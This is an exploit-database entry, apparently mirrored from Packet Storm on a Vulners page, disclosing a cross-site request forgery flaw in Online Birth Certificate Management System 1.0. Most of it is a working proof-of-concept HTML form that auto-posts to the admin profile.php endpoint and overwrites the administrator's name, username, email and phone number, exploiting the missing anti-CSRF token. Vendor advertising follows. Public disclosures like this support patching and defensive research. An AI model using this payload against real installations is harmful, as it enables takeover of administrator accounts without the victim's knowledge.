Lucene search
K

Online Birth Certificate Management System 1.0 Cross Site Request Forgery

🗓️ 27 Sep 2022 00:00:00Reported by Yousef AlraddadiType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 279 Views

Online Birth Certificate Management System 1.0 Cross Site Request Forgery (CSRF) on Profile Updat

Code
`# Exploit Title: Online Birth Certificate Management System - Cross Site Request Forgery (CSRF)  
# Google Dork: N/A  
# Date: 2022-9-27  
# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11  
# Vendor Homepage: https://www.sourcecodester.com/php/15683/online-birth-certificate-management-system-php-free-download.html  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/OBCMS.zip  
# Tested on: windows 11 - XAMPP  
# CVE : N/A  
# Version: 1.0  
  
# no token in update profile admin  
  
<html>  
<head>  
<title> CSRF update Profile </title>  
</head>  
<body>  
<form action="http://localhost/OBCMS/admin/profile.php" method="post" enctype="multipart/form-data">  
<input type="hidden" name="adminname" value="csrf111">  
<input type="hidden" name="username" value="csrf">  
<input type="hidden" name="email" value="csrf">  
<input type="hidden" name="mobilenumber" value="0">  
<button class="btn btn-sm btn-primary login-submit-cs" type="submit" name="submit">Save Change</button>  
</form>  
</body>  
</html>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation